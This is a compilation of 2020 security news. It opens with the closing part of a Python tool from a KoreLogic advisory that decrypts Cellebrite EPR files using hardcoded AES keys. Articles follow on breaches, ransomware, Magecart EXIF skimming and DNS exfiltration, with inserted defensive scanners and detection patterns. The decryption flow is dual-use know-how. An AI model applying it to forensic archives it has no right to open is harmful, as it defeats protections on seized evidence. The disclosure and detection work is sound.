        move("{}.zip".format(self.file), "{}.zip".format(self.file.replace("input", "output")))
        logger.info("[+] Decrypted file available at {}.zip".format(self.file.replace("input", "output")))
        return True


def main():
    parser = OptionParser()
    parser.add_option("--file", dest="file", default=False, help="EPR File Path")
    parser.add_option("--version", dest="version", choices=(str(1), str(2), str(3)), default=str(3), help="EPR Version")
    parser.add_option("--verbose", dest="verbose", action="store_true", help="Enable verbose mode")
    o, a = parser.parse_args()
    o.version = int(o.version)
    epr = EPR(o.file, o.version, o.verbose)
    if not epr.file_exists():
        logger.info("[!] Unable to find the encrypted EPR file specified.")
        return False
    logger.info("[+] The EPR file specified exists.")
    if not epr.can_read_file():
        logger.info("[!] Unable to open a file object to the encrypted EPR file.")
        return False
    if not epr.read_entire_file():
        logger.info("[!] Unable to read the encrypted EPR file.")
        return False
    logger.info("[+] The specified EPR file has been read into memory.")
    logger.info("[+] Using the version {} decryption process.".format(o.version))
    if not epr.flat_decrypt():
        logger.info("[!] Unable to run the initial decryption round.")
        return False
    logger.info("[+] Round one of the EPR decryption completed successfully.")
    if not epr.calc_sha256_dword():
        logger.info("[!] Unable to calculate the SHA256 key flag.")
        return False
    if o.verbose:
        logger.info("[+] The SHA256 key flag has been calculated.")
    if not epr.key_map_check():
        logger.info("[!] Unable to find a AES key match.")
        return False
    if o.verbose:
        logger.info("[+] The SHA256 key flag has been found.")
    if not epr.decrypt_key():
        logger.info("[!] 
Could not decrypt the final AES key.") return False logger.info("[+] Round two of the EPR decryption completed successfully. Obtained the final AES key and IV.") if not epr.decrypt_epr(): logger.info("[!] Unable to decrypt the EPR file.") return False logger.info("[+] Round three of the EPR decryption completed successfully. The encrypted zip archive has been
decrypted.") if not epr.zip_FF(): logger.info("[!] Could not clean up garbage.") return False return True if __name__ == "__main__": success = main() if success: logger.info("[+] done") else: logger.info("[!] failed") exit(success) The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

KL-001-2020-003 : Cellebrite EPR Decryption Relies on Hardcoded AES Key Material (KoreLogic Disclosures via Full Disclosure, Jun 29)

Researchers who found the archived SQL files estimate up to 14 million people could be affected.

A team of security researchers has discovered a collection of SQL databases for sale on the Dark Web. The archived files were stolen from 945 websites around the world, Lucy Security reports.

All of these websites were breached by different attackers, according to the researchers, who found two databases containing approximately 150 GB of unpacked SQL files. One of these databases was released on June 1, 2020 and the other on June 10. The information within them, now publicly available, includes usernames, full names, phone numbers, hashed and non-hashed passwords, IP addresses, email addresses, and physical addresses. Up to 14 million people may be affected. 

Affected websites include 14 governmental sites belonging to Ukraine, Israel, United Kingdom, Belarus, Russia, Lebanon, Rwanda, Pakistan, and Kyrgyzstan. The SQL files taken from these websites are dated between 2017 and 2020. 

These findings are alarming on their own; however, researchers warn “this might be only the beginning.” The actor who shared this data on the Dark Web claims to have collected it without doing any of the hacking and promises to have more databases to share or sell.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.


A California university which is dedicated solely to public health research has paid a $1.14m ransom to a criminal gang in the hopes of regaining access to its data.

The University of California San Francisco (UCSF) paid out in the apparently successful hope that the Netwalker group would send it a decryption utility for its illicitly encrypted files, which it referred to as “data … important to some of the academic work we pursue as a university serving the public good”.

A negotiator acting on behalf of UCSF was said to have opened the bidding for the decryptor at $780,000, according to the BBC which claimed that an “anonymous tipoff” allowed it to “follow the ransom negotiations in a live chat on the dark web”.


UCSF said miscreants had “encrypted a limited number of servers within the School of Medicine” – on 1 June – and said on Friday that it was working with outside experts to “fully restore the affected servers”. While the university is carrying out research on COVID-19, it said in a public statement that the attack did not affect that.

It also noted that patient medical records and patient care were not affected – the university has a teaching hospital attached, the San Francisco Medical Center.

Infosec researcher Brett Callow of threat intel biz Emsisoft told The Register that Netwalker is one of the gangs that did not join a previous underworld declaration by more “ethical” criminals who promised to avoid attacking institutions fighting the coronavirus pandemic.

The Register has asked UCSF for comment about the ransom payments as well as about its data backup processes.

Sophos published a blog post a few weeks ago going into depth about Netwalker’s tactics and tools.

Britain’s state-owned broadcaster also published what it said were extracts of live chat messages posted by the criminals as they negotiated with UCSF over the ransom. Using news media attention as a means of increasing pressure on victims to pay up is an increasingly popular tactic among ransomware gangs.

Some have even established clearnet and darknet blogs where they post snippets of leaked data and rant about uncooperative victims, in the hope of attracting journalists’ attention and headlines that put the spotlight on victims and pressure others into paying.

British government advice, increasingly echoed around the world, is not to pay ransoms. There’s no guarantee that criminals will stick by their word and, indeed, there is every incentive for them to score a payout from desperate victims and then auction off stolen data regardless of promises not to do so. ®


Watching a $1.14 million ransomware negotiation between hackers and scientists searching for COVID-19 treatments

An anonymous tip-off to BBC News enabled them to watch in real-time as an American medical university attempted to negotiate with the hackers who had infected its systems with ransomware.

As reporter Joe Tidy describes, the University of California San Francisco (UCSF) was attacked by the notorious NetWalker ransomware on the first day of June.

Netwalker message

A ransom demand left by the gang directed the university dedicated to medical research to a payment page on the dark web, where they could find an FAQ, an offer of a “free” sample of a decrypted file (proving decryption was possible), and the ability – just like so many legitimate websites – to have a live chat with a support operator.

Netwalker chat message. Source: BBC News

Of course, negotiating the safe recovery of your encrypted files is so much more stressful when the webpage also contains a countdown timer, threatening to either double the ransom demand or publish stolen data onto the internet if time runs out.

Six hours after asking, the University of California San Francisco must have been relieved to have been given more time, and for news of the attack to be removed from NetWalker’s public website.

Netwalker chat message. Source: BBC News

However, the hackers demanded $3 million, and were less than impressed when whoever was at the UCSF’s end of the conversation begged them to accept $780,000 citing the “financially devastating” damage caused by the Coronavirus pandemic. UCSF has been conducting antibiotic clinical trials in the fight against COVID-19.

Netwalker chat message. Source: BBC News

Ultimately, after what BBC News describes as a “day of back-and-forth negotiations,” the two sides agreed to a final payment of $1,140,895. 116.4 bitcoins were transferred to cryptocurrency wallets owned by the NetWalker gang the following day, and the university received the decryption software required to recover its affected data.


Speaking to BBC News, UCSF explained why it had decided to give in to its digital extortionists:

“The data that was encrypted is important to some of the academic work we pursue as a university serving the public good.

“We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained.

“It would be a mistake to assume that all of the statements and claims made in the negotiations are factually accurate.”

Nobody likes the idea of cybercriminals making money out of successful ransomware attacks. Every time one organisation decides to pay its extortionists it incentivises malicious hackers to launch yet more ransomware attacks against unsuspecting targets.

At the same time, I can understand how organisations that feel they have no other option might make the difficult decision that it’s better to pay the criminals than have their organisation further disrupted, or its data exposed on the internet.

The University is now said to be assisting in the FBI’s investigation into the attack, and restoring its affected systems.

One final thought for you all: whose interest is it in to tip off BBC News about a ransomware negotiation as it happens?


SMBs are responsible for nearly 44% of US economic activity, but given the current climate, it can be difficult for them to find available and/or affordable resources.

As organizations across the country begin to emerge from their mandatory COVID-19 hibernations, the transition could be difficult for many as they continue to feel the brunt of the health crisis and its economic impact. These challenges would be exacerbated for small and midsize businesses (SMBs). Although reopenings and renewed operations offer initial hope, they’re also being met with a great deal of uncertainty because many SMBs have fewer resources — in terms of capital and personnel — than they previously had.

Often overshadowed by large enterprises, SMBs are responsible for nearly 44% of economic activity in the United States, according to the US Small Business Administration. But given the current climate, it can be difficult for SMBs to find available and/or affordable resources, and they are finding themselves easy targets for cyberattacks. In response, they are looking to the cybersecurity community now more than ever for accessible cybersecurity solutions, especially considering the never-ending wave of malware, ransomware, and phishing campaigns.

What exactly should SMBs be looking for as they determine the best products and services to mitigate their cybersecurity issues and enhance their overall security postures? Here are three simple, yet effective suggestions.

Simple Pricing
First and foremost, finding free or low-cost versions of cybersecurity products or services is a must. Luckily for SMBs, many organizations have offered their solutions at discounted rates in response to the coronavirus pandemic. These security vendors are rightfully recognizing how essential it is to keep SMBs — which serve as the backbone of their local economies — up and running. By taking advantage of these discounts and forming initial business relationships with vendors, SMBs that weather the COVID-19 storm will already have the resources and relationships in place to scale their security needs once “normal” operations resume.

However, it’s important to note that SMBs should look out for any fine print attached to discounted solutions regarding geographic boundaries, user threshold limits, and specific time frames. While anyone in need of enhanced security should have the ability to access such terms, this is often not the case, and SMBs should be especially wary of hidden or misleading disclaimers.

Ease of Installation and Deployment
SMBs typically employ small IT teams that often cover security as a secondary skill set, so it can be understandably overwhelming for them to choose from among the sheer number of available security products and services. This also makes it difficult for them to understand which of the thousands of solutions on the market are the right fit for their business needs. Even if all of the details are outlined, SMB decision-makers can still struggle with simply knowing how to respond to active threats and deploying the technology. Therefore, solutions that are very simple, both in terms of installation and deployment, should be prioritized by those involved in leadership positions.

Low Maintenance and User Experience
Similarly, ongoing maintenance that does not require a dedicated IT or security team to constantly implement updates or include additional customizations should be emphasized when comparing options. Given that day-to-day users will likely not be security-savvy, having an intuitive user experience should be a key component of any security solution under consideration. Employees will want to be able to maintain their level of productivity while simultaneously staying secure. Ultimately, the balance between easy maintenance and enhanced usability is a delicate one, but SMBs shouldn’t think they have to trade one for the other. 

By taking these three recommendations to heart, SMBs can improve their overall security and collectively protect the businesses that make up nearly half of our country’s economy. Even better, they’ll be able to keep their doors open for business to customers and keep their workers employed, while keeping both parties secure from cyber threats.


Kowsik Guruswamy is CTO of Menlo Security. Previously, he was co-founder and CTO at Mu Dynamics, which pioneered a new way to analyze networked products for security vulnerabilities. Before Mu, he was a distinguished engineer at Juniper Networks. Kowsik joined Juniper …


On the face of it, it sounded like a good idea.

A smartphone app, disguised as a regular app delivering the top world, sports, and entertainment news, containing a secret feature that allows victims of domestic abuse to send a covert distress call for help at the touch of a button.

That was the idea behind the free Aspire News App, launched some years ago by When Georgia Smiled, a US non-profit founded by Robin McGraw and her husband US TV star “Dr Phil” to help victims of domestic violence and sexual assault.

To be honest, that still sounds like a good idea to me – if the app is coded well, and if any data it collects is properly secured.

But what isn’t a good idea is for voice recordings made by the app to be left exposed on an unsecured Amazon Web Services (AWS) S3 bucket, allowing anyone with internet access to download them and listen if they so wish.

According to security researchers at VPN Mentor, who found the exposed data, over 4,000 voice recordings of emergency messages left by victims of domestic violence were available to access – no password required.

Some of the 230MB worth of recordings included personally identifiable information such as names, home addresses, as well as the identities of violent abusers.

Transcripts of just two of the recordings that were exposed reveal the seriousness of the situation:

“[Full Name] is threatening or hurting me. Please send help now. [Full address]”

and

“Please call the police right away and have them come to [Full Address]. I am in great danger. I need you to send the police right away, please…”

Potentially, if the information fell into the wrong hands it could not only expose people who did not want the data revealed at the risk of extortion, but it could also put victims in greater physical danger if their abuser found out.

The researchers attempted to reach out to When Georgia Smiled and the Dr. Phil Foundation to get the serious data breach fixed last Wednesday, but ultimately it took the involvement of AWS itself to get the unsecured web bucket shut down.

So, that’s a happy end to the story, right?

Well, perhaps not.

You see, a security failure like this could lead to victims of domestic abuse losing confidence in Aspire News App. If they do not feel safe any longer using the app, they may find it harder to escape abusive relationships safely.

That clearly wasn’t what Dr Phil and his wife Robin McGraw wanted – the Aspire News app was supposed to help people escape dangerous situations, not make it even harder to find a way out.
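The failure described above, a bucket whose contents anyone on the internet can read, comes down to three settings that are easy to audit: the bucket ACL, the bucket policy, and the Block Public Access configuration. The following is an added example, not code from the article, from When Georgia Smiled or from AWS. It evaluates constructed copies of those three settings in the dict shapes boto3 returns from get_bucket_acl(), get_bucket_policy() (after json.loads of the Policy string) and get_public_access_block(), so it runs offline; the bucket, owner ID and grants are made up for the example.

```python
"""Offline evaluation of whether an S3 bucket's access settings expose it to anonymous readers.

Added example. Inputs are constructed dicts in the shape boto3 returns; Deny statements,
IAM conditions and object-level ACLs are not modelled, so a "public" verdict is a finding
to confirm, not a complete IAM evaluation.
"""

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:*", "*"}


def _as_list(value):
    """IAM accepts a single string wherever a list is allowed; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def acl_public_grants(acl):
    """Permissions the ACL grants to AllUsers (anonymous) or AuthenticatedUsers
    (any AWS account whatsoever). Both count as public."""
    public = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in (ALL_USERS, AUTHENTICATED_USERS):
            public.append(grant.get("Permission"))
    return public


def policy_allows_anonymous_read(policy):
    """True if an Allow statement with a wildcard principal covers a read or list action."""
    for statement in _as_list(policy.get("Statement")):
        if statement.get("Effect") != "Allow":
            continue
        principal = statement.get("Principal")
        anonymous = principal == "*" or (
            isinstance(principal, dict) and "*" in _as_list(principal.get("AWS")))
        if not anonymous:
            continue
        actions = {a.lower() for a in _as_list(statement.get("Action"))}
        if actions & READ_ACTIONS:
            return True
    return False


def bucket_is_public(acl, policy=None, public_access_block=None):
    """Combine ACL, bucket policy and Block Public Access settings into one verdict.

    IgnorePublicAcls makes S3 disregard public ACL grants; RestrictPublicBuckets limits a
    bucket with a public policy to principals in the owning account. The other two flags
    (BlockPublicAcls, BlockPublicPolicy) only stop new public settings being written, so
    they do not change the verdict for settings that already exist.
    """
    pab = (public_access_block or {}).get("PublicAccessBlockConfiguration", {})
    via_acl = bool(acl_public_grants(acl)) and not pab.get("IgnorePublicAcls", False)
    via_policy = (policy is not None and policy_allows_anonymous_read(policy)
                  and not pab.get("RestrictPublicBuckets", False))
    return via_acl or via_policy


# Constructed sample inputs: no real bucket, account or data.
EXPOSED_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ],
}
PRIVATE_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"}, "Permission": "FULL_CONTROL"}],
}
PUBLIC_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::constructed-bucket/*"}],
}
HARDENED_PAB = {"PublicAccessBlockConfiguration": {
    "BlockPublicAcls": True, "IgnorePublicAcls": True,
    "BlockPublicPolicy": True, "RestrictPublicBuckets": True}}

if __name__ == "__main__":
    print("exposed ACL alone:", bucket_is_public(EXPOSED_ACL))                                   # True
    print("private ACL + public policy:", bucket_is_public(PRIVATE_ACL, PUBLIC_POLICY))            # True
    print("both, behind Block Public Access:", bucket_is_public(EXPOSED_ACL, PUBLIC_POLICY, HARDENED_PAB))  # False
```

The last case is the one worth noting: with all four Block Public Access flags enabled at the account level, a stray public ACL or wildcard policy on any bucket stops mattering, which is why that setting, rather than per-bucket review, is the usual first control.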


British infosec businesses are celebrating the 30th birthday of the Computer Misuse Act 1990 by writing to Prime Minister Boris Johnson urging reform of the elderly cybercrime law.

The Computer Misuse Act (CMA) received Royal Assent on 29 June 1990, before “the concept of cyber security and threat intelligence research,” the CyberUp campaign group said in its letter [PDF].

“Now, 30 years on, the CMA is the central regime governing cybercrime in the UK despite being originally designed to protect telephone exchanges,” it added. “This means that the CMA inadvertently criminalises a large proportion of modern cyber defence practices.”

CyberUp was founded by a coalition of infosec firms including NCC Group, Orpheus Cyber, Context Information Security and Nettitude, as we reported last summer when the campaign wrote its first letter to the PM.

So far Boris hasn’t got round to replying.

CyberUp’s latest missive, that carries twenty signatories, warns: “With less threat intelligence research being carried out, the UK’s critical national infrastructure is left at an increased risk of cyber attacks from criminals and state actors.”

The main problem posed by the current CMA is that it criminalises any “unauthorised access”, under section 1 of the act, to a computer. This means “defensive cyber activities” of the sort carried out by CyberUp’s members are at best in a grey area – and at worst classified as downright illegal; as the campaign put it, “criminals are obviously very unlikely to explicitly authorise such access.”

In January a group of academics published a detailed report echoing calls for the CMA to be reformed, including detailed legal proposals on exactly how to tweak the offences created by the act.

The CMA itself was passed into law after the legendary 1985 Prestel hack on Prince Philip’s email inbox. Prosecutors tried and failed to convict journalists Steve Gold and Robert Schifreen of forgery after the duo spotted mainframe login credentials had been left publicly exposed and typed them in to see what would happen. The logic was that they had somehow forged the password; something that the Court of Appeal eventually threw out.

Around 40 CMA cases are brought to court every year with about 90 per cent of prosecutions resulting in a conviction, according to court data analysed by The Register last year.

The only corporate CMA prosecution to date took place in 2018. A firm called Smart Recruitment, a trading name of Workchain Ltd, hatched a plot to diddle junior workers out of company pension contributions. Company managers blagged workers’ account ID numbers from pension provider NEST before logging onto its online system in the workers’ names to click the necessary opt-out buttons. Directors were jailed and the company was fined more than £280,000.

Most recently a Manchester police gunman was jailed under the CMA after abusing his force computer login to find and contact prostitutes whose details had previously been hoovered up by police. ®


A United States federal district court has finally sentenced a Russian hacker to nine years in federal prison after he pleaded guilty to running two illegal websites devoted to facilitating payment card fraud, computer hacking, and other crimes.

Aleksei Yurievich Burkov, 30, pleaded guilty in January this year to two of the five charges against him for credit card fraud—one count of access device fraud and one count of conspiracy to commit access device fraud, identity theft, computer intrusions, wire fraud, and money laundering.

Burkov admitted to operating a website named Cardplanet that was dedicated to buying and selling stolen credit card and debit card data for anywhere between $2.50 and $10 per payment card, depending on the card type, origin, and availability of card owner information.

According to the U.S. Department of Justice, Cardplanet hosted roughly 150,000 payment card details between 2009 and 2013, most of which belonged to U.S. citizens and were used to make over $20 million in fraudulent purchases.

“Aleksei’s massive fraud victimized hundreds of thousands of people and resulted in over $20 million in losses,” said G. Zachary Terwilliger, U.S. Attorney for the Eastern District of Virginia.

“Tackling global cybercrime means holding accountable leaders like Burkov who have allowed cybercrime to become organized and hyper-specialized. I want to thank our prosecutors and investigative partners for their terrific work on this complex case.”

In addition to Cardplanet, Burkov ran another invite-only forum website for elite cybercriminals where they advertised stolen personal identifying information (PII), malicious software, and other criminal services, like money laundering and hacking.

To become a member of Burkov’s cybercrime forum, one needed to pay $5,000 as insurance and have three existing members vouch for one’s excellent reputation among cybercriminals.

According to the court documents, such measures were put in place to “keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum.”

Burkov was arrested at Ben-Gurion Airport near Tel Aviv, Israel, in December 2015 and extradited to the U.S. in November 2019 after he lost his appeals against extradition in the Israeli Supreme Court and the Israeli High Court of Justice.

Before his extradition to the U.S., Russia also offered Israel a deal to release Burkov in exchange for freeing Israeli citizen Naama Issachar, imprisoned in Russia for drug offenses, but Israel refused to release Burkov and approved the U.S. extradition request.

Burkov had faced a maximum of 15 years in prison for the charges he admitted in January, but today the U.S. federal district court judge sentenced him to nine years in prison.


In what’s one of the most innovative hacking campaigns, cybercrime gangs are now hiding malicious code implants in the metadata of image files to covertly steal payment card information entered by visitors on the hacked websites.

“We found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores,” Malwarebytes researchers said last week.

“This scheme would not be complete without yet another interesting variation to exfiltrate stolen credit card data. Once again, criminals used the disguise of an image file to collect their loot.”

The evolving tactic of the operation, widely known as web skimming or a Magecart attack, comes as bad actors are finding different ways to inject JavaScript scripts, including misconfigured AWS S3 data storage buckets and exploiting content security policy to transmit data to a Google Analytics account under their control.

Using Steganography to Hide Skimmer Code in EXIF

Banking on the growing trend of online shopping, these attacks typically work by inserting malicious code into a compromised site, which surreptitiously harvests and sends user-entered data to a cybercriminal’s server, thus giving them access to shoppers’ payment information.

In this week-old campaign, the cybersecurity firm found that the skimmer was not only discovered on an online store running the WooCommerce WordPress plugin but was contained in the EXIF (short for Exchangeable Image File Format) metadata for a suspicious domain’s (cddn.site) favicon image.

Every image comes embedded with information about the image itself, such as the camera manufacturer and model, date and time the photo was taken, the location, resolution, and camera settings, among other details.

Using this EXIF data, the hackers executed a piece of JavaScript that was concealed in the “Copyright” field of the favicon image.

“As with other skimmers, this one also grabs the content of the input fields where online shoppers are entering their name, billing address, and credit card details,” the researchers said.

Aside from encoding the captured information using the Base64 format and reversing the output string, the stolen data is transmitted in the form of an image file to conceal the exfiltration process.

Stating the operation might be the handiwork of Magecart Group 9, Malwarebytes added the JavaScript code for the skimmer is obfuscated using the WiseLoop PHP JS Obfuscator library.

This is not the first time Magecart groups have used images as attack vectors to compromise e-commerce websites. Back in May, several hacked websites were observed loading a malicious favicon on their checkout pages and subsequently replacing the legitimate online payment forms with a fraudulent substitute that stole user card details.
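Because the payload described above sits in an EXIF text field rather than in a script file, a content scan that only looks at .js responses never sees it. The following is an added example, not Malwarebytes' or Magecart code: a minimal JPEG/EXIF walker that pulls the ASCII tags of IFD0 (Copyright, Artist, Software and so on) and flags any field whose text looks like JavaScript rather than metadata. The build_jpeg_with_exif() helper constructs the test images inline so the scan runs offline; the script-like string in the sample is an inert placeholder, not a skimmer, and the tag names, marker list and length threshold are choices made for this example.

```python
"""Scan a JPEG's EXIF ASCII fields for script-like content (added example)."""
import struct

TAG_NAMES = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model", 0x0131: "Software",
             0x013B: "Artist", 0x8298: "Copyright"}
ASCII = 2  # TIFF field type for NUL-terminated text
SCRIPT_MARKERS = ("function(", "eval(", "document.", "window.", "atob(", "fromCharCode", "<script")


def build_jpeg_with_exif(ascii_tags):
    """Constructed test data: SOI, one APP1/Exif segment with a little-endian IFD0, EOI."""
    n = len(ascii_tags)
    data_start = 8 + 2 + 12 * n + 4          # TIFF header, entry count, entries, next-IFD pointer
    entries, data = [], b""
    for tag, text in sorted(ascii_tags.items()):
        value = text.encode("latin-1") + b"\x00"
        if len(value) <= 4:                   # values of up to 4 bytes live inside the entry itself
            entries.append(struct.pack("<HHI", tag, ASCII, len(value)) + value.ljust(4, b"\x00"))
        else:
            entries.append(struct.pack("<HHII", tag, ASCII, len(value), data_start + len(data)))
            data += value
    ifd0 = struct.pack("<H", n) + b"".join(entries) + struct.pack("<I", 0)
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd0 + data
    app1_body = b"Exif\x00\x00" + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(app1_body) + 2) + app1_body
    return b"\xff\xd8" + app1 + b"\xff\xd9"


def _parse_ifd0_ascii(tiff):
    """Return {tag name: text} for the ASCII entries of the first IFD in a TIFF blob."""
    endian = {b"II": "<", b"MM": ">"}[tiff[:2]]
    ifd_off = struct.unpack(endian + "I", tiff[4:8])[0]
    count = struct.unpack(endian + "H", tiff[ifd_off:ifd_off + 2])[0]
    fields = {}
    for i in range(count):
        e = ifd_off + 2 + 12 * i
        tag, ftype, n, offset = struct.unpack(endian + "HHII", tiff[e:e + 12])
        if ftype != ASCII:
            continue
        raw = tiff[e + 8:e + 8 + n] if n <= 4 else tiff[offset:offset + n]
        fields[TAG_NAMES.get(tag, "0x%04X" % tag)] = raw.rstrip(b"\x00").decode("latin-1", "replace")
    return fields


def exif_ascii_tags(jpeg):
    """Walk the JPEG marker segments up to the scan data and parse the first APP1/Exif segment."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG stream")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):            # EOI / SOS: no further metadata segments
            break
        seg_len = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and body.startswith(b"Exif\x00\x00"):
            return _parse_ifd0_ascii(body[6:])
        pos += 2 + seg_len
    return {}


def suspicious_exif_fields(jpeg, max_len=256):
    """Names of ASCII fields that look like code: script syntax present, or far longer
    than a credit line or camera name would ever be."""
    flagged = []
    for name, text in exif_ascii_tags(jpeg).items():
        if any(marker in text for marker in SCRIPT_MARKERS) or len(text) > max_len:
            flagged.append(name)
    return flagged


# Constructed samples: an ordinary image and one whose Copyright field carries inert script syntax.
BENIGN_JPEG = build_jpeg_with_exif({0x010F: "ConstructedCam", 0x8298: "Copyright 2020 Example Shop"})
SUSPECT_JPEG = build_jpeg_with_exif({0x8298: "(function(){/* constructed placeholder */document.title;})()"})

if __name__ == "__main__":
    print(exif_ascii_tags(BENIGN_JPEG))          # {'Make': 'ConstructedCam', 'Copyright': 'Copyright 2020 Example Shop'}
    print(suspicious_exif_fields(SUSPECT_JPEG))  # ['Copyright']
```

Run it over favicons and product images served from a store's own origin as well as from third-party hosts; the scan is cheap because it stops at the start-of-scan marker and never decodes pixel data.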

Abusing DNS Protocol to Exfiltrate Data from the Browser

But data-stealing attacks don’t have to be necessarily confined to malicious skimmer code.

In a separate technique demonstrated by Jessie Li, it’s possible to pilfer data from the browser by leveraging dns-prefetch, a latency-reducing method used to resolve DNS lookups for cross-origin domains before resources (e.g., files, links) are requested.

Called “browsertunnel,” the open-source software consists of a server that decodes messages sent by the tool, and a client-side JavaScript library to encode and transmit the messages.

The messages themselves are arbitrary strings encoded in a subdomain of the top domain being resolved by the browser. The tool then listens for DNS queries, collecting incoming messages, and decoding them to extract the relevant data.

Put differently, ‘browsertunnel’ can be used to amass sensitive information as users carry out specific actions on a webpage and subsequently exfiltrate it to a server by disguising it as DNS traffic.

“DNS traffic does not appear in the browser’s debugging tools, is not blocked by a page’s Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios,” Li said.
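Whatever triggers the lookups, encoding arbitrary messages into subdomains leaves a recognisable shape in resolver logs: many distinct, long, high-entropy labels under one zone from one client. The following is an added example, not part of browsertunnel or of Li's write-up. It parses constructed query-log lines (timestamp, client, query type, name), groups them per client and zone, and flags groups that match that shape; the log format, the two-label zone split and the thresholds are assumptions for the example.

```python
"""Flag DNS-tunnelling patterns in query logs (added example, constructed data)."""
import math
from collections import defaultdict

# Constructed sample log; the tunnel-style labels are random-looking but carry no real data.
SAMPLE_LOG = """\
2020-06-30T09:00:01Z 10.0.0.5 A www.example.test
2020-06-30T09:00:02Z 10.0.0.5 A cdn.example.test
2020-06-30T09:00:03Z 10.0.0.5 A mail.example.test
2020-06-30T09:00:04Z 10.0.0.5 A 3q7x9kfa2m0pzl1b.t.tunnel-example.test
2020-06-30T09:00:04Z 10.0.0.5 A h8d2c5v1n6b4m9x0.t.tunnel-example.test
2020-06-30T09:00:05Z 10.0.0.5 A p1o2i3u4y5t6r7e8.t.tunnel-example.test
2020-06-30T09:00:05Z 10.0.0.5 A z9x8c7v6b5n4m3a2.t.tunnel-example.test
2020-06-30T09:00:06Z 10.0.0.5 A q0w9e8r7t6y5u4i3.t.tunnel-example.test
2020-06-30T09:00:06Z 10.0.0.5 A l1k2j3h4g5f6d7s8.t.tunnel-example.test
2020-06-30T09:00:07Z 10.0.0.9 A www.example.test
2020-06-30T09:00:08Z 10.0.0.9 AAAA static.example.test
"""


def parse_dns_log(text):
    """Return [(client, qname)] from lines of 'timestamp client qtype qname'; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        records.append((parts[1], parts[3].rstrip(".").lower()))
    return records


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string or a single repeated character)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_zone(qname, zone_labels=2):
    """Split a name into (subdomain, zone), treating the last two labels as the zone.
    Assumption for the example; a real deployment should use a public-suffix list."""
    labels = qname.split(".")
    if len(labels) <= zone_labels:
        return "", qname
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])


def flag_tunnel_candidates(records, min_unique=5, min_entropy=3.0, min_len=12):
    """Per (client, zone) stats for groups whose subdomains look like encoded payloads."""
    groups = defaultdict(set)
    for client, qname in records:
        sub, zone = split_zone(qname)
        if sub:
            groups[(client, zone)].add(sub)
    findings = []
    for (client, zone), subs in sorted(groups.items()):
        first_labels = [s.split(".")[0] for s in subs]   # the leftmost label carries the payload
        mean_entropy = sum(map(shannon_entropy, first_labels)) / len(first_labels)
        mean_len = sum(map(len, first_labels)) / len(first_labels)
        if len(subs) >= min_unique and mean_entropy >= min_entropy and mean_len >= min_len:
            findings.append({"client": client, "zone": zone, "unique_subdomains": len(subs),
                             "mean_entropy": round(mean_entropy, 2), "mean_label_len": round(mean_len, 1)})
    return findings


if __name__ == "__main__":
    for finding in flag_tunnel_candidates(parse_dns_log(SAMPLE_LOG)):
        print(finding)
```

The thresholds need tuning against a baseline: CDNs and some anti-malware products legitimately generate hashed-looking labels, so the zone allow-list is as important as the entropy cut-off. The point of the check is that it works on resolver or egress logs, which is exactly where this traffic still appears after it has slipped past CSP and browser tooling.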


In Brief Redmond is bulking up the security around its AzureStack hardware-to-cloud bundle by acquiring infosec firm CyberX.

Microsoft says the newly-integrated security house will be used to help secure industrial gear and other Internet-of-Things devices running under AzureStack, giving companies more reason to buy into the ground-up pitch from Microsoft.

“Microsoft will now provide a simpler approach to unified security governance across both IT and industrial networks, as well as end-to-end security across managed and unmanaged IoT devices, enabling organizations to quickly detect and respond to advanced threats in converged networks,” Redmond boasted.

CardPlanet boss gets nine years

The Russian man behind the notorious criminal hangout website Cardplanet will spend the better part of a decade in a US prison cell.

